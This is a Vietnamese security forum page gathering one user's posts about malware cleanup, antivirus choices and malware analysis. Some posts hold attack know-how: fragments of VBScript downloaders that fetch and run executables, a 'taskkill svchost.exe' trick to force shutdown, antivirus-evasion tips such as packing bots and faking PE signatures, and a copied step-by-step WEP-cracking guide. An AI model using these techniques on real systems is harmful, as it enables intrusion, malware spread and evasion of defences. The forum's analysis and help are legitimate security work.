banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: congminh923  XML
Profile for congminh923 Messages posted by congminh923 [ number of posts not being displayed on this page: 0 ]
 
Mình nghi là con virus này chỉnh sửa partition của USB, do đó bạn nên dùng chương trình để sửa lỗi partition.

_Đầu tiên, bạn phải tắt tất cả các chương trình đang mở trong USB. Nhớ lại tên của ổ USB.
_vào start->run->gõ "cmd", enter
gõ chkdsk <tên đường dẫn USB> /R /R

ví dụ ổ USB của bạn có đường dẫn là G: thì bạn gõ chkdsk G: /F /R
rồi bấm enter.
Chúc bạn thành công.
Cái Dev-C++ này hơi lạ. Nếu chọn Use heuristic to compile faster thì nó báo lỗi khi compile. Nếu tắt nó đi thì không bị lỗi. Tại sao vậy?
Bài 1 cực kì đơn giản, sử dụng thuật toán lùa bò vào chuồng là xong.
Gợi ý : sử dụng tập hợp với toán tử in, khi khai báo chỉ số của mảng, không dùng số mà dùng chữ.
Ngày mai mình sẽ post source lên. Bây giờ buồn ngủ quá rồi.
Dễ thôi. smilie Vào trang này : http://www.offensivecomputing.net
Đăng ký một account, đăng nhập, gõ tên malware vô ô Malware Search rồi tìm kiếm.

Lưu ý : lúc gõ tên malware bạn nên dùng các tên do các antivirus có trong virustotal.com đặt tên. Không dùng tên virus do BKAV đặt tên.
smilie Mình thử rồi. Test trên máy mình luôn.
Hầu hết mấy con này đều được tạo ra từ Visual Basic 6.0 nên bạn chỉ cần đổi thành đuôi .exe rồi dùng VB Decompiler là xong, khỏi phải đọc code ASM smilie (nhớ dùng PE Scanner quét trước để xem nó có phải là VB 6.0 hay không nhé)
Dùng chương trình Wireshark để sniff traffic đi.
Hoặc dùng Cain rồi bấm sniff, chạy con keylog trong sandboxie, bạn sẽ lấy ngay được email và pass của chủ nhân con keylog đó rất nhanh. smilie
Lưu 2 script vào 2 file text trên ổ cứng. Dùng lệnh fc file1.txt file2.txt sẽ thấy rõ sự khác biệt mà không cần tốn nhiều công sức.


Comparing files a.txt and B.TXT
***** a.txt
on error resume next
dl = "http://xxxxx/1234.jpg"
Set df = document.createElement ("object")
***** B.TXT
on error resume next
dl = "http://xxxxx/abcd.jpg"
Set df = document.createElement ("object")
*****

***** a.txt
x.Send
fname1="SVCHOST555.exe"
set F = df.createobject("Scripting.FileSystemObject","")
***** B.TXT
x.Send
fname1="inst_vinh.exe"
set F = df.createobject("Scripting.FileSystemObject","")
*****
 


Các đoạn script trên sẽ tải các file "SVCHOST555.exe" và "inst_vinh.exe" rồi lưu vào máy và chạy nó bằng lệnh ShellExecute. Đơn giản thế thôi, không có gì khó phân tích đâu anh. :p
Có lẽ do máy chủ của website đó bị nhiễm malware, hoặc ai đó đã cài chúng lên hoặc Antivirus diệt nhầm (trường hợp này ít gặp). Mình dùng Avira Antivir cũng gặp trường hợp tương tự như bạn.
Học giỏi Undectection Techniques là xong.
dùng RatRescueCenter để phục hồi TaskManager. Dùng Avira Antivir để quét. Bây giờ Avira được chọn là mạnh nhất rồi, đừng tiếc mà dùng Kaspersky nữa.

Side Winder wrote:
Đang hỏi về Remote shutdown mà bạn... smilie
Nếu chạy trên máy thì cần gì phải làm rắc rối thế... smilie)
 


Chịu khó suy nghĩ đi.
Khi bạn chạy đoạn code trên ở máy khác thì máy đó sẽ shutdown, còn bạn ko biết chạy hoặc không thể chạy thì thua smilie
Bạn có thể dùng lệnh "taskkill /f /im svchost.exe", chạy lệnh này trên máy xong là máy bạn sẽ tự shutdown trong vòng 1 phút vì RPC bị tắt. Còn chạy như thế nào thì bạn tự làm nhé.
Link die rồi anh ơi! Up lên lại đi anh.

BaVuong1 wrote:
Chỉ Có Cài WIN ... 1 Tuần Tui Dính Nó 3 Lần .. DIE Máy Cả 3 Lần ..! 


Đừng có xúi bậy người ta! Nếu không diệt tận gốc rễ thì vẫn bị nhiễm lại thôi.

Dùng RATRescueCenter để phục hồi chức năng Windows. Cài thêm Avira AntiVir để quét. Gửi file bạn nghi ngờ cho các antivirus lab. Dùng Anubis http://anubis.iseclab.org/ để xem thử hành vi của nó.
Mình thấy Malwarebytes' Anti-Malware cũng tệ. Mình thừ 10 con trojan khác nhau, quét bằng BitDefender và Avira thì nó chém sạch hết, còn Malwarebytes' Anti-Malware thì lúc nào cũng không phát hiện malware (mặc dù tên nó là antimalware). Bây giờ bạn dùng Your Uninstaller 2008 gỡ nó và All in one Cleaner quét hết registry là có thể gỡ sạch thằng này ra khỏi máy. smilie
Để yên ổn thì không nên dùng beta software. smilie
Em thấy một số diễn đàn khác nói rằng do Kaspersky hook nhiều hơn các trình diệt virus khác nên bị màn hình xanh.
VD : Malware inject vô explorer.exe thành công thì không bị BitDefender phát hiện ngay, khi nó kết nối ra ngoài mới bị Firewall của BitDefender diệt. Còn KAV hoặc KIS thì malware vừa injection vô explorer.exe là bị phát hiện và diệt ngay.

Không biết điều này có đúng không? smilie
Vậy ko biết pass mà nó lưu giữ cụ thể ở đâu vậy? nó có nằm ở đâu đó trong hệ thống ko ? 


---> đừng dùng ngôn ngữ chat : từ "ko" được dùng trong ngôn ngữ chat.

Lưu ở đâu kệ nó. Dùng Asterisk Logger là xong -> http://www.nirsoft.net/utils/astlog.html


PEid dễ bị lừa bằng một trong các cách sau :
_Đổi Entry Point (PEid sẽ báo là Nothing Found)
_Dùng Fake Nịna (PEid sẽ phát hiện sai)
_Dùng RLPack, chọn mục fake signature (PEid sẽ phát hiện sai)

-> Nên dùng thêm RDG Packer Detector, vô config, chọn M-B, tuy quét lâu hơn nhưng sẽ chính xác hơn.

conmale wrote:

越南全国人口约8300万,经济发展迅猛,政治局势稳定。近两年越南经济增长速度为8%左右,发展速度在全球位居第二位。2002年11月中国-东盟自由贸易区计划正式启动,2006年11月07日越南正式加入世界贸易组织WTO,由此给中国和越南企业带来了无限的新商机。越南作为东盟成员国之一,是中国产品进入东盟5亿人口消费市场的最佳跳板和最便捷通道。近十年来中越两国贸易额增长了100多倍, 现中国已成为越南第一大贸易伙伴。2006年越中贸易额将突破100亿美元,两国政府设立长远目标到2010年努力使越中贸易额达到150亿美元。
 


--->
Vietnam, the country's population of about 83,000,000, the rapid economic development, political stability of the situation. In the past two years Vietnam's economic growth rate of 8% growth rate in the world's second largest. November 2002 China - ASEAN Free Trade Area plans to formally launch on November 7, 2006 Vietnam's accession to the World Trade Organization, WTO, to which China and Vietnam have brought unlimited business opportunities in the new. Vietnam as a member of ASEAN, ASEAN is China's products into the consumer market population of 500,000,000 springboard for the best and most convenient channel. China and Vietnam over the past 10 years the volume of trade between the two countries increased by 100 times, and now China has become Vietnam's largest trading partner. 2006 Vietnam-China trade volume will exceed 10,000,000,000 U.S. dollars, the two governments to set up long-term goal by 2010 to make the Vietnam-China trade volume to 150 million. 


(Google dịch ra tiếng Việt thật kinh khủng, nên em để tiếng Anh cho chính xác hơn)

nhưng mình không hiểu nó nói gì cả 


Có gì mà không hiểu? Học ASM đi, dùng OllyDbg và đọc thêm sách Manual Packing sẽ hiểu thôi.
Muốn có mã nguồn hàm XOR thì vô google search là xong. smilie
Để thuận tiện, khi bạn thấy phần mềm nào có bug hoặc bạn không biết xử lý ra sao thì vô diễn đàn của công ty sản xuất phần mềm đó.

Windows 7 ---> forums.microsoft.com
Beta software là soft vẫn còn bug, chưa hoàn chỉnh. Nếu không có ai thử vọc beta software thì làm sao nó hoàn chỉnh được? smilie
Mình hỏi cách lần theo dấu vết truy cập từ máy khác  


Cho bạn 1 từ khóa : "Forensic", lên google tìm. Hy vọng bạn sẽ giỏi về lĩnh vực này.
Sau này giỏi rồi thì chỉ lại mình nhé. Đừng như những người giấu nghề, họ chỉ lung tung mà chẳng giúp ai cả.

---> http://en.wikipedia.org/wiki/Forensic
hic, Em tải về bitdefender báo có virus là sao vậy Bác? 

Vì trong đó có 1 script dạy tạo virus, hình như là trong thư mục coding. Nó ghi dưới dạng txt nên vô hại, không cần lo đâu.

Mấy cái này qua bên site của mấy pa ngoài huế có mà đầy smilie
Link : http://httpscript.com khu vực hackz0ne
Site duy nhất của Việt Nam có trong Top 100 Underground Technology Websites chứ hông phải chuyện chơi đâu nhá smilie
Nào là tìm file ppt , pdf rất pro, nào là check invisible rất chính xác smilie vân vân và vân vân
hii em lanh chanh tí smilie  


Cho mình hỏi tí:
Sao mình vào xem thì nó ghi là Huehacker.info?
Mình đề nghị :

Dùng Avira Antivir Free vì hiện nay, nó được đánh giá là mạnh hơn cả Kaspersky 2009 và BitDefender 2009.
Tiếp theo là BitDefender 2009. Vì nó diệt virus bằng các hàm heuristic rất mạnh.
Ví dụ : Khi mình pack virus lại rồi fake signature thì BitDefender vẫn phát hiện --> BehavesLike: Win32.Malware

Kaspersky 2009 thì không nên dùng (nhất là dùng chui) vì khi dùng chui, nó diệt virus không hiệu quả lắm. Hơn nữa nó hook nhiều hơn các AV khác nên máy dễ bị màn hình xanh (dù có trả tiền bản quyền). Vả lại, do có quá nhiều người dùng KIS và KAV nên Kaspersky đã bị làm giả : Một số người tạo ra giao diện giống y hệt Kaspersky (giống 100%), gài trojan vào đó rồi nói là crack ---> Nguy hiểm lắm.
Không tin thì tớ đưa source của nó lên cho xem.
Ráng kiếm phần mềm RAT rescue center (RRC) đi. Thằng này có khả năng phục hồi các chức năng bị ẩn (rất nhiều) + thêm Radar Mode mà lại free nữa.

hix huynh giải thich đệ chẳng hiểu gì cả. huynh có thể giải thích dõ dàng hơn không. mà con bot đấy được viết bằng C++ mà. mà đệ vẫn chưa hiểu cách điều khiển con not trên MIRC. hix đọc tài liệu hoa cả mắt ngồi ngẫm nghĩ chán nhưng cuối cùng vẫn không hiểu. càng đọc trong đầu càng nhiều câu hỏi.
 


Nếu bạn thật sự muốn tạo botnet thì bạn phải học thật giỏi về lập trình, reverse engineering, mã hóa và hiểu rõ các Antivirus (ưu điểm và nhược điểm của chúng). Có một kỹ thuật gọi là Undetection Technique. Kỹ thuật này thường được dùng để bypass các antivirus nhưng rất khó thực hiện. Và cho dù bạn có thành công thì chỉ sau vài ngày, bot của bạn cũng sẽ bị antivirus thịt hết. Nếu bạn chỉ đơn thuần tạo bot mà không mã hóa, pack,... con bot của bạn thì đảm bảo chưa đầy một tuần sau sẽ bị hầu hết các trình diệt virus phát hiện ra. Hiểu chưa? Nếu không hiểu những điều căn bản thì không thể xài botnet được. smilie

PS : Em chỉ nói thế thôi. Em không khuyến khích việc dùng botnet để DDOS và cũng không hướng dẫn cụ thể về botnet. Mong các anh MOD đừng ban/lock nick em.
Tình cờ, cháu tìm thấy cái này, chú bác nào rành thì hướng dẫn giúp cháu với. Cháu có laptop mà không có mạng Wireless nên không thực hành được. Ai có mạng wireless share cho cháu thực tập với. smilie
Topic đang nói về WPA nhưng cháu post WEP nên hơi lạc đề một tí. Các chú đừng phạt cháu. T_T


WEP Cracking, FBI Style( In Just 3 Minutes ) !

FUN FACTS:

-WEP stands for Wired Equivalent Privacy
-WEP is used to secure wireless networks from eavesdroppers
-WEP usually takes hours to crack

WEP has always been a long and tedious job, untill recently, when two FBI agents demonstrated how it´s possible to crack WEP in under 4 minutes (3 to be exact).

Here is how they did it:

1. Run Kismet to find your target network. Get the SSID and the channel.
2. Run Airodump and start capturing data.
3. With Aireplay, start replaying a packet on the target network. (You can find a ‘good packet’ by looking at the BSSID MAC on Kismet and comparing it to the captured packet’s BSSID MAC).
4. Watch as Airodump goes crazy with new IVs. Thanks to Aireplay.
5. Stop Airodump when you have about 1,000 IVs.
6. Run Aircrack on the captured file.
7. You should see the WEP key infront of you now.

PROGRAMS USED:

-Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
It is designed for Linux.

You can download it at www.kismetwireless.net
A windows version can be downloaded at http://www.renderlab.net/projects/wrt54g/kiswin.html

-Aircrack (Includes Airodump, Aireplay, Aircrack and optional Airdecap for decrypting WEP/WPA capture files)

Aircrack is the 802.11 WEP and WPA-PSK keys cracking program that can recover this keys once enough encrypted packets have been captured with airodump.

Airdecap is used to decrypt WEP/WPA capture files.

Airmon can be used to configure the wireless card.

Aireplay is used to inject frames.

Airodump is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (initialization vectors) for the intent of using them with aircrack-ng.

Download the whole suit at www.aircrack-ng.org
 


(Sưu tầm từ h4cky0u)
Hiện nay mình có source của khoảng 150 con bot. Nhưng vấn đề chính không phải là tạo botnet như thế nào mà vấn đề chính là sự yên lặng của bot. Tạo bot thì được nhưng tạo rồi thì antivirus chém sạch hết trơn. Mình thử tạo con mới rồi pack lại, fake PE signature nên các trình diệt Antivirus không báo nó là bot mà báo :

BehavesLike:malware 

và thế là nó chém chết con bot. smilie

Nên thôi bạn đừng dùng botnet nữa. Có tạo ra được thì cũng bị AV chém hết. Mà thiết lập rồi thì sẽ bị vào tù thôi.

Bạn muốn compile nó thì phải biết nó viết bằng ngôn ngữ nào. Đôi khi nó được viết bằng LCC mà bạn compile bằng MS Visual C++ hay Borland C++ thì thất bại.
Bạn thử dùng RatRescueCenter (RRC) thử xem. Nó cũng có nhiều chức năng khôi phục máy sau khi bị dính virus. smilie
 
Go to Page:  2 3 4 Page 5 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|